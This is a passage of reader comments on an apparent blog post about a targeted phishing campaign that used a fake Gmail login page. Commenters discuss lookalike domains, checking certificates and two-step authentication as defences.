    -- this is not a photo and not a doc, and not a pdf. All links for View Download are just URLs leading directly to a fake, credential harvesting gmail page

    ReplyDelete
  8. Anonymous said...

    This gives too much emphasis on insignificant visual clues that the attacker can easily resolve. Unless your trying to embarrass the attackers with their shoddy work.

    An attacker could easily create a perfect and upto date visual clone with correct page name and links. The only significant information here for end users is that the domain name is wrong and ssl is not used and they could even of done a better job of that. Perhaps using a phishing address such as goog1e.com and enabling ssl.

    The best advice for high profile targets, is to understand howto verify the site certificate is the correct one for google. The browsers could do more here.

    I'm also very found of the two stage authentication mechanism from Google, that makes this type of attacker very difficult.

    - Matt
    [ Not available for designing scams :-) ]

    -- The visial clues are not advice and things to watch for the future but explanation for the past event. I am sure the next one will be better done and perhaps very different.

    ReplyDelete
  9. Excellent article Mil!


    I have had the very same problem with targeted attacks against my gmail account. Probably because I used to do work about free China.

    I mean, free internet China.

    ReplyDelete
  10. thanks for taking the time to post this valuable information.

    ReplyDelete